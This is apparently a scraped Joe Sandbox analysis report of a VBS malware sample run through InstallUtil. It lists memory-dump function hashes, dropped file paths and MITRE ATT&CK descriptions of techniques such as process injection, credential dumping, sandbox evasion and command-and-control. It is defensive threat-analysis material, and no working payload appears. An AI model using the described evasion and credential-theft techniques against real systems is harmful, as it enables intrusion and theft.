Function 04CF60F0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4

Function 04CF20F0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4

Function 04CEAD18 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94

Function 04CE7620 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9db1b77679bdd4786cec17428f19a285bfb9279bf2843b68fcd3332de89ee4c5
Instruction ID: dba5901c7cc009fa71e86c484fb61237957c1122b3f4afc793f44601ba926e53
Opcode Fuzzy Hash: 9db1b77679bdd4786cec17428f19a285bfb9279bf2843b68fcd3332de89ee4c5
Instruction Fuzzy Hash: BAC08CB2804440CBC7108FA0A6986107B219788322F1A409ED6090F2E2C2328813EB00

Function 04CED340 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af8e06a732ca707132f27ef7a83e288a845aad2dfe2584e40d54ff240b01922d
Instruction ID: 2ad57114494cc740969b95bee8f444b209d5990da35e5c480c7824bf6c3857fe
Opcode Fuzzy Hash: af8e06a732ca707132f27ef7a83e288a845aad2dfe2584e40d54ff240b01922d
Instruction Fuzzy Hash: B7C09276140208EFC700DF69E844C45BBB8FF1976071180A1FA088B332C732E820DA94

Function 04D166DA Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099d4333f308308a9254cac8a25ddd2c564bcddf53b4e27a79bb81b420707c1d
Instruction ID: f49d4f96fb9c7c47852ee67a2c16f1e71819416a14f9e2680fec16746a722714
Opcode Fuzzy Hash: 099d4333f308308a9254cac8a25ddd2c564bcddf53b4e27a79bb81b420707c1d
Instruction Fuzzy Hash: 79C04C74E42068DBFB54DB11ED51F5972F5BB84254F0082E5CA0D773A0D6356E81CF64

Function 04D1817E Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a1b181a877c4c8b5097ca175a9117e11441aa51719e317497164a11dc9f50d4
Instruction ID: 9a90b841376ce2e9a676a737f523a9345833365d8452d96317a8d84bb4397f97
Opcode Fuzzy Hash: 6a1b181a877c4c8b5097ca175a9117e11441aa51719e317497164a11dc9f50d4
Instruction Fuzzy Hash: 52B01234208004CF8244F6C8E740414B352DFC4218318C0AEA80CCF712CB33EC038640

Function 04D19BB7 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 495f4a3084cba5c9441c0886f22c92c826f31c1a085ea4eb671b674680b88307
Instruction ID: e3035e1df7ffdbc822d593d919369507016f68dfc9301ef73b291b06a96b9eaf
Opcode Fuzzy Hash: 495f4a3084cba5c9441c0886f22c92c826f31c1a085ea4eb671b674680b88307
Instruction Fuzzy Hash: 27B0123BB400199ACB00D6C8F4504ECFB30EBD4332F004033C300620008B31157AC760

Function 04CFC169 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e20f7cd7afed99e60c02252a9db1c6562a7f5c312db12e28109d524c54bbf2b1
Instruction ID: b6d074a531417ce5efee044fc7df5a4387fc9f51c61cfde2100974b93bb56db9
Opcode Fuzzy Hash: e20f7cd7afed99e60c02252a9db1c6562a7f5c312db12e28109d524c54bbf2b1
Instruction Fuzzy Hash: 7DC04C74746200DBDB54AF26E918E6877B1EB88312F040075A507C3398DF3C9C95CF00

Function 04CF3360 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580

Function 04D1D910 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1f1ffc6563b5dddf45b604b5295224396605bf93a5b4528ceb32de38eb73576
Instruction ID: 91979cbc4b0212db875fecf28793fa86f41017b83ce9b093b6b1e4a8e1f8e2a6
Opcode Fuzzy Hash: c1f1ffc6563b5dddf45b604b5295224396605bf93a5b4528ceb32de38eb73576
Instruction Fuzzy Hash: CCA02230003B0C838A0032F82003223338C288220838008BEA20C08E230C33E0A0808C

Function 04CFFD40 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4a2a0a44381aa2bda737fe892d9c23aa57e5d7916b19dc24501f842be437f3a
Instruction ID: de5f963939e364922758a52304f3a99e9cc610007b9333af09e614d8d2b445a4
Opcode Fuzzy Hash: a4a2a0a44381aa2bda737fe892d9c23aa57e5d7916b19dc24501f842be437f3a
Instruction Fuzzy Hash: 67A02230082B0C828F0032F8200322033AC28802083C000F8A20C08E220833E0A08088

Function 04D1DD50 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7360b7b043b0817b30753a36439381e8f62aaa23d7b1c881a75d6b498bad34bb
Instruction ID: 4160213894556790463e0593d54b18b8e80366c72c63bb77cd38bfa080f123ab
Opcode Fuzzy Hash: 7360b7b043b0817b30753a36439381e8f62aaa23d7b1c881a75d6b498bad34bb
Instruction Fuzzy Hash: 0D90023104960C8B454027957419599779CD54462678100A2E51D425016A5B785055A5

Function 04CE9110 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6fef0cda10d06c9a9e2430454720f754c554b80d1b725370a2b5d4a7d20d086
Instruction ID: 54a9084d2d0d6a8038c3f40130586a86786cbd723f3ad1f2e79144949fa17f25
Opcode Fuzzy Hash: b6fef0cda10d06c9a9e2430454720f754c554b80d1b725370a2b5d4a7d20d086
Instruction Fuzzy Hash:

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report RFQ_43200046412000086500125.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mm5sfz2w.xtf.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zd2z0d0u.q3b.psm1

C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
RFQ_43200046412000086500125.vbs

Function 09940040 Relevance: 5.1, Strings: 3, Instructions: 1335
COMMON

Function 074A3598 Relevance: 3.1, Strings: 2, Instructions: 613
COMMON

Function 07CA0428 Relevance: 10.3, Strings: 8, Instructions: 315
COMMON

Function 07CA1E48 Relevance: 7.9, Strings: 6, Instructions: 391
COMMON

Function 09931C20 Relevance: 6.6, Strings: 5, Instructions: 350
COMMON

Function 07CA0CF8 Relevance: 6.4, Strings: 5, Instructions: 137
COMMON

Function 09A26D89 Relevance: 5.3, Strings: 4, Instructions: 263
COMMON

Function 09933B10 Relevance: 4.2, Strings: 3, Instructions: 483
COMMON

Function 09935840 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Function 0993A220 Relevance: 4.1, Strings: 3, Instructions: 360
COMMON

Function 09A2702E Relevance: 4.0, Strings: 3, Instructions: 237
COMMON

Function 07CA0CD7 Relevance: 3.8, Strings: 3, Instructions: 98
COMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre